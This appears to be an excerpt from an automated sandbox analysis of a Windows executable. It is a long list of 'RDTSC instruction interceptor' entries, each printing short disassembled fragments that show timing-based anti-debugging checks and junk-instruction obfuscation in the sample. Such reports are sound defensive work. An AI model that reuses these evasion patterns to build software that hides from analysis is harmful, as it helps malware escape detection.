              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D494C second address: 8D4950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4950 second address: 8D4954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4954 second address: 8D495E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D495E second address: 8D4962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4F33 second address: 8D4F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D694D second address: 8D6951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6951 second address: 8D6955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6955 second address: 8D695B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D695B second address: 8D697A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F052CEB1F1Dh 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D697A second address: 8D697E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D697E second address: 8D6984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6984 second address: 8D6A20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c sub dword ptr [ebp+122D35C9h], esi 0x00000012 call 00007F052CBC2117h 0x00000017 mov dword ptr [ebp+122D1A1Bh], eax 0x0000001d pop eax 0x0000001e popad 0x0000001f call 00007F052CBC2109h 0x00000024 push ebx 0x00000025 push edx 0x00000026 jmp 00007F052CBC2118h 0x0000002b pop edx 0x0000002c pop ebx 0x0000002d push eax 0x0000002e jnp 00007F052CBC2125h 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 jmp 00007F052CBC2114h 0x0000003d mov eax, dword ptr [eax] 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6A20 second address: 8D6A2A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F052CEB1F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D75A2 second address: 8D75A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D75A6 second address: 8D75AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D78AB second address: 8D78B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D78B1 second address: 8D78B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7B5B second address: 8D7B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D80E1 second address: 8D80EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D89C5 second address: 8D89CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D89CE second address: 8D89D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D88EA second address: 8D88EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D89D2 second address: 8D8A65 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F052CEB1F18h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov esi, 7BE7A94Bh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F052CEB1F18h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 pushad 0x00000046 mov dword ptr [ebp+122D1CF7h], edx 0x0000004c mov ebx, dword ptr [ebp+122D2960h] 0x00000052 popad 0x00000053 mov edi, dword ptr [ebp+122D2998h] 0x00000059 push 00000000h 0x0000005b mov edi, dword ptr [ebp+122D18F7h] 0x00000061 mov edi, dword ptr [ebp+122D28ECh] 0x00000067 xchg eax, ebx 0x00000068 jnc 00007F052CEB1F24h 0x0000006e push eax 0x0000006f push ecx 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D8A65 second address: 8D8A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D9A48 second address: 8D9AA0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F052CEB1F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e or dword ptr [ebp+1246F4D1h], esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F052CEB1F18h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov edi, dword ptr [ebp+122D1BFFh] 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push edi 0x0000003c jmp 00007F052CEB1F26h 0x00000041 pop edi 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DACB9 second address: 8DACBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC915 second address: 8DC919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC919 second address: 8DC91D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC91D second address: 8DC925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DCF2A second address: 8DCF40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC2112h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DCF40 second address: 8DCF4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F052CEB1F16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E0099 second address: 8E00A3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F052CBC2106h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E31F0 second address: 8E3247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F052CEB1F1Ch 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F052CEB1F18h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 jmp 00007F052CEB1F1Ch 0x0000002d push 00000000h 0x0000002f jl 00007F052CEB1F19h 0x00000035 sub bh, FFFFFFB2h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b pop edi 0x0000003c stc 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3247 second address: 8E3250 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3505 second address: 8E350B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E5508 second address: 8E5519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CBC210Ch 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E350B second address: 8E350F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E6403 second address: 8E6415 instructions: 0x00000000 rdtsc 0x00000002 js 00007F052CBC2106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F052CBC210Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E350F second address: 8E351D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E6415 second address: 8E6424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 jc 00007F052CBC210Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E351D second address: 8E3521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3521 second address: 8E352B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E82CC second address: 8E82D6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F052CEB1F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E352B second address: 8E352F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E82D6 second address: 8E832F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F052CEB1F1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F052CEB1F18h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D2629h], eax 0x0000002b push 00000000h 0x0000002d mov edi, dword ptr [ebp+122D2958h] 0x00000033 push 00000000h 0x00000035 mov bx, BCAAh 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F052CEB1F25h 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA1F9 second address: 8EA203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F052CBC2106h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA203 second address: 8EA20D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F052CEB1F16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA20D second address: 8EA217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA217 second address: 8EA21B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8458 second address: 8E8465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8465 second address: 8E8469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA21B second address: 8EA240 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC2110h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jng 00007F052CBC2112h 0x00000012 jnp 00007F052CBC210Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8469 second address: 8E8473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA760 second address: 8EA764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA764 second address: 8EA768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EB798 second address: 8EB79C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC86A second address: 8EC8E7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F052CEB1F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F052CEB1F18h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jmp 00007F052CEB1F1Eh 0x0000002b mov edi, 6418ADD7h 0x00000030 push 00000000h 0x00000032 mov edi, 1F1C672Ah 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F052CEB1F18h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 pushad 0x00000054 xor ebx, dword ptr [ebp+122D1A4Fh] 0x0000005a mov edx, 2B758E45h 0x0000005f popad 0x00000060 xchg eax, esi 0x00000061 push ebx 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC8E7 second address: 8EC8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F052CBC2106h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0805 second address: 8F0809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0809 second address: 8F0812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F1E3A second address: 8F1E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F2DF7 second address: 8F2DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F10F0 second address: 8F10F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3D62 second address: 8F3DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jns 00007F052CBC2108h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e nop 0x0000000f mov bl, cl 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F052CBC2108h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d clc 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F052CBC2108h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov bx, B8E0h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 jmp 00007F052CBC2114h 0x00000057 pop eax 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC140 second address: 8FC147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC147 second address: 8FC14D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC14D second address: 8FC151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9008D4 second address: 9008D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9008D8 second address: 9008F3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F052CEB1F25h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 895A56 second address: 895A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FFFB8 second address: 8FFFC8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F052CEB1F16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FFFC8 second address: 8FFFCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90011F second address: 90015D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jbe 00007F052CEB1F16h 0x00000012 jmp 00007F052CEB1F29h 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edi 0x0000001b jmp 00007F052CEB1F1Bh 0x00000020 pop edi 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90015D second address: 900163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9002B0 second address: 9002BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F052CEB1F16h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 900411 second address: 90041E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jc 00007F052CBC2106h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90041E second address: 90042B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F052CEB1F18h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90042B second address: 900439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jng 00007F052CBC2106h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9049C2 second address: 9049CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F052CEB1F16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9049CC second address: 9049EA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F052CBC2106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f push edi 0x00000010 jmp 00007F052CBC210Ah 0x00000015 pop edi 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 904ADD second address: 904AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 904AE3 second address: 904AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8909B2 second address: 8909B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8909B6 second address: 8909FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F052CBC2117h 0x0000000d jno 00007F052CBC210Ch 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jng 00007F052CBC2106h 0x0000001d jc 00007F052CBC2106h 0x00000023 push esi 0x00000024 pop esi 0x00000025 popad 0x00000026 push ebx 0x00000027 jnp 00007F052CBC2106h 0x0000002d pop ebx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8909FC second address: 890A1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F25h 0x00000007 push edi 0x00000008 jng 00007F052CEB1F16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90972E second address: 909734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909734 second address: 909738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
